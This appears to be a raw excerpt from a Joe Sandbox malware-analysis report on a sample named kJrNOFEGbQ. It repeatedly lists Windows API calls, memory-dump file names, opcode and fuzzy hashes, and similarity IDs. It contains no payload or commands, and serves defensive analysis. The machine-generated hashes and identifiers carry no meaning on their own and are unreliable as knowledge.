                                                                                                                                    • Opcode Fuzzy Hash: 31bd0146457bcfd31a0a57d00152b07e708580c7f57fa8e2dadbebc4ac1d62d1
                                                                                                                                    • Instruction Fuzzy Hash: 70A011CA2A8002BC322A22002E02C3B022CC0CAF20330E8AEF82A88880A8880C000832
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E580
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: Fjun7
                                                                                                                                    • API String ID: 1269201914-1894352427
                                                                                                                                    • Opcode ID: 8ddbde0bbbf159f4e708b9d72b78f3cd680ce0283e87b57012b0ebcd4a49d2e9
                                                                                                                                    • Instruction ID: 17738dec1d8511a9d8ee601dee3d3e967d3bd27756e27c93edd811a0480f4300
                                                                                                                                    • Opcode Fuzzy Hash: 8ddbde0bbbf159f4e708b9d72b78f3cd680ce0283e87b57012b0ebcd4a49d2e9
                                                                                                                                    • Instruction Fuzzy Hash: 67A012C11680017C311611501C02C37011CC0C9F20330D45DF42988480684408001431
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E580
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: Fjun7
                                                                                                                                    • API String ID: 1269201914-1894352427
                                                                                                                                    • Opcode ID: 62f364bf0b023927d1ae5047a87069ca68658f4473eb86fd85468a9b086f23f6
                                                                                                                                    • Instruction ID: 17738dec1d8511a9d8ee601dee3d3e967d3bd27756e27c93edd811a0480f4300
                                                                                                                                    • Opcode Fuzzy Hash: 62f364bf0b023927d1ae5047a87069ca68658f4473eb86fd85468a9b086f23f6
                                                                                                                                    • Instruction Fuzzy Hash: 67A012C11680017C311611501C02C37011CC0C9F20330D45DF42988480684408001431
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0038B7BB: GetOEMCP.KERNEL32(00000000,?,?,0038BA44,?), ref: 0038B7E6
                                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0038BA89,?,00000000), ref: 0038BC64
                                                                                                                                    • GetCPInfo.KERNEL32(00000000,0038BA89,?,?,?,0038BA89,?,00000000), ref: 0038BC77
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CodeInfoPageValid
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 546120528-0
                                                                                                                                    • Opcode ID: 8e0bb639b9e058106b10f0878966c39f11c822bf941f0b50b7232e7e92b96a0a
                                                                                                                                    • Instruction ID: 0a002bfd3d4ea2d7291f3ba06b4c941558e675aac1319710d703a1a22425d965
                                                                                                                                    • Opcode Fuzzy Hash: 8e0bb639b9e058106b10f0878966c39f11c822bf941f0b50b7232e7e92b96a0a
                                                                                                                                    • Instruction Fuzzy Hash: DE51F670900347AFDB22EF75C4916BAFBF9EF41300F1844EED4968B261D735954A8B90
                                                                                                                                    APIs
                                                                                                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00369A50,?,?,00000000,?,?,00368CBC,?), ref: 00369BAB
                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00368411,-00009570,00000000,000007F3), ref: 00369BB6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                    • Opcode ID: 7c52843619c392dfdf2a0973dadc4ab7814f35fe63a71ebc9e93795fb748f1b9
                                                                                                                                    • Instruction ID: 126a071177915debd15028941008d1556bac5878d3174289fe4601eb27c7aeb8
                                                                                                                                    • Opcode Fuzzy Hash: 7c52843619c392dfdf2a0973dadc4ab7814f35fe63a71ebc9e93795fb748f1b9
                                                                                                                                    • Instruction Fuzzy Hash: A341CE70604301CFDB26DF19E58466AB7EDFFD5320F16CA2FE88287268D770AD458A51
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00361E55
                                                                                                                                      • Part of subcall function 00363BBA: __EH_prolog.LIBCMT ref: 00363BBF
                                                                                                                                    • _wcslen.LIBCMT ref: 00361EFD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog$_wcslen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2838827086-0
                                                                                                                                    • Opcode ID: 7b6456f9416e6fb0391ad042b7cb150f396ba648648a98fff51d0a7d73e1fd49
                                                                                                                                    • Instruction ID: 9d43d336f39d0efe37224e7290a5335d82f145f45a6f0ad566b9dbd4ad79defc
                                                                                                                                    • Opcode Fuzzy Hash: 7b6456f9416e6fb0391ad042b7cb150f396ba648648a98fff51d0a7d73e1fd49
                                                                                                                                    • Instruction Fuzzy Hash: C1313C72904209AFCF16DF99C945AEEFBF5AF48300F1480A9F445AB255CB769E10CB60
                                                                                                                                    APIs
                                                                                                                                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,003673BC,?,?,?,00000000), ref: 00369DBC
                                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00369E70
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$BuffersFlushTime
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1392018926-0
                                                                                                                                    • Opcode ID: 6833062aaa42011597bb5d25998007acab733dcce4b6ffa096db9037c936dbf2
                                                                                                                                    • Instruction ID: 50439e6014e83e71acc1d5924708aa5ce6a2c666660cc147270f76b3965991d7
                                                                                                                                    • Opcode Fuzzy Hash: 6833062aaa42011597bb5d25998007acab733dcce4b6ffa096db9037c936dbf2
                                                                                                                                    • Instruction Fuzzy Hash: C721EE32248286EBC716CF34C891BABBBECAF55704F09882EF4C587145D339E90D9B61
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00369F27,?,?,0036771A), ref: 003696E6
                                                                                                                                    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00369F27,?,?,0036771A), ref: 00369716
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                    • Opcode ID: 34a4e5e4469007fb07b93f9e6cb4d24dcd67505fa0f8378cdc2bc7c9e07a5191
                                                                                                                                    • Instruction ID: e1ab8092a249de20605acb152e591d4e1210c9e83d6567dbe7e9b766a91541b6
                                                                                                                                    • Opcode Fuzzy Hash: 34a4e5e4469007fb07b93f9e6cb4d24dcd67505fa0f8378cdc2bc7c9e07a5191
                                                                                                                                    • Instruction Fuzzy Hash: 1321F1B1004344AFE3318A64CC89FB7B7DCEB49330F018A1AF9D6C65D9C378A8848631
                                                                                                                                    APIs
                                                                                                                                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00369EC7
                                                                                                                                    • GetLastError.KERNEL32 ref: 00369ED4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                    • Opcode ID: 6e0d849302269b809566dcd92cc860d7450bc9835fbae1c07c42aa3fc6af73a6
                                                                                                                                    • Instruction ID: df34ecde0fdec894e8efa185474b89f9bebc30df9a23f06754ce867b50581efa
                                                                                                                                    • Opcode Fuzzy Hash: 6e0d849302269b809566dcd92cc860d7450bc9835fbae1c07c42aa3fc6af73a6
                                                                                                                                    • Instruction Fuzzy Hash: 1911E530600700ABD726C628C841BA6B7ECAB45370F518A2BE153D2AD8D7B2ED45C760
                                                                                                                                    APIs
                                                                                                                                    • _free.LIBCMT ref: 00388E75
                                                                                                                                      • Part of subcall function 00388E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0038CA2C,00000000,?,00386CBE,?,00000008,?,003891E0,?,?,?), ref: 00388E38
                                                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,003A1098,003617CE,?,?,00000007,?,?,?,003613D6,?,00000000), ref: 00388EB1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Heap$AllocAllocate_free
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2447670028-0
                                                                                                                                    • Opcode ID: 8d9621c950110d9e95b91ec1ac85bb3bd15cd1d805cf6d64715c191dd6e8d77d
                                                                                                                                    • Instruction ID: db6892e9ec948ed41a0326fafa89314906803a39df8e25cd371d3f0ff7fd8f26
                                                                                                                                    • Opcode Fuzzy Hash: 8d9621c950110d9e95b91ec1ac85bb3bd15cd1d805cf6d64715c191dd6e8d77d
                                                                                                                                    • Instruction Fuzzy Hash: 95F0C23220530666CB237B25AC05B6F376C8F81B70FA605A6F854AA191DF60FD0183A0
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 003710AB
                                                                                                                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 003710B2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1231390398-0
                                                                                                                                    • Opcode ID: 11740574bbdd6c68b4c6b0ad138c097f029f7ff2b7bd526f65affe1f93649cd6
                                                                                                                                    • Instruction ID: 54fa056a10ed014a24d07a9296ec7477e1819e381f1bf1130151a0e63c09b299
                                                                                                                                    • Opcode Fuzzy Hash: 11740574bbdd6c68b4c6b0ad138c097f029f7ff2b7bd526f65affe1f93649cd6
                                                                                                                                    • Instruction Fuzzy Hash: D1E0D873B10145ABCF2B8BB89C058EB73DDEA44304711C176E407E3201F938DE414A60
                                                                                                                                    APIs
                                                                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0036A325,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A501
                                                                                                                                      • Part of subcall function 0036BB03: _wcslen.LIBCMT ref: 0036BB27
                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0036A325,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A532
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2673547680-0
                                                                                                                                    • Opcode ID: 7cecca90e9b691cf6fc8e46ad234b5c5559c0f2733eb64bedb8eb3eae4db9a19
                                                                                                                                    • Instruction ID: d5e09dad74827950b216c6d2e9bf3bccdfca6a3d37ec770925d798e2c15d8c76
                                                                                                                                    • Opcode Fuzzy Hash: 7cecca90e9b691cf6fc8e46ad234b5c5559c0f2733eb64bedb8eb3eae4db9a19
                                                                                                                                    • Instruction Fuzzy Hash: 9EF030712401097BDF135F61DC45FDA37ACAF04385F448051B94AE6164EB71DED4DE50
                                                                                                                                    APIs
                                                                                                                                    • DeleteFileW.KERNELBASE(000000FF,?,?,0036977F,?,?,003695CF,?,?,?,?,?,00392641,000000FF), ref: 0036A1F1
                                                                                                                                      • Part of subcall function 0036BB03: _wcslen.LIBCMT ref: 0036BB27
                                                                                                                                    • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0036977F,?,?,003695CF,?,?,?,?,?,00392641), ref: 0036A21F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DeleteFile$_wcslen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2643169976-0
                                                                                                                                    • Opcode ID: 2fe3c5508ba04ddcc95f5b6088597c36bbac2c2dbb95239a0df24bfad915a190
                                                                                                                                    • Instruction ID: fac5d4660ef89e7df104a4095e38f43b4169d07214e9aeb011f0e2c9b230aedd
                                                                                                                                    • Opcode Fuzzy Hash: 2fe3c5508ba04ddcc95f5b6088597c36bbac2c2dbb95239a0df24bfad915a190
                                                                                                                                    • Instruction Fuzzy Hash: 2CE0D8751442096BEB135F60DC46FD9375CAF0C3C5F488061B945E6154EB72DEC4DE54
                                                                                                                                    APIs
                                                                                                                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,00392641,000000FF), ref: 0037ACB0
                                                                                                                                    • CoUninitialize.COMBASE(?,?,?,?,00392641,000000FF), ref: 0037ACB5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: GdiplusShutdownUninitialize
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3856339756-0
                                                                                                                                    • Opcode ID: bc54b56a65aef8494da8c956cd9fface9105ad9632f5fa74b19ba6cf7399c84b
                                                                                                                                    • Instruction ID: aaf3d130665de9b4ee1eb02249789242728b87c8df72d9ccb7966cd747131214
                                                                                                                                    • Opcode Fuzzy Hash: bc54b56a65aef8494da8c956cd9fface9105ad9632f5fa74b19ba6cf7399c84b
                                                                                                                                    • Instruction Fuzzy Hash: 87E06572504650EFCB129B5DDC06B45FBACFB4DB20F044266F416D3760CB747800CA90
                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,0036A23A,?,0036755C,?,?,?,?), ref: 0036A254
                                                                                                                                      • Part of subcall function 0036BB03: _wcslen.LIBCMT ref: 0036BB27
                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0036A23A,?,0036755C,?,?,?,?), ref: 0036A280
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
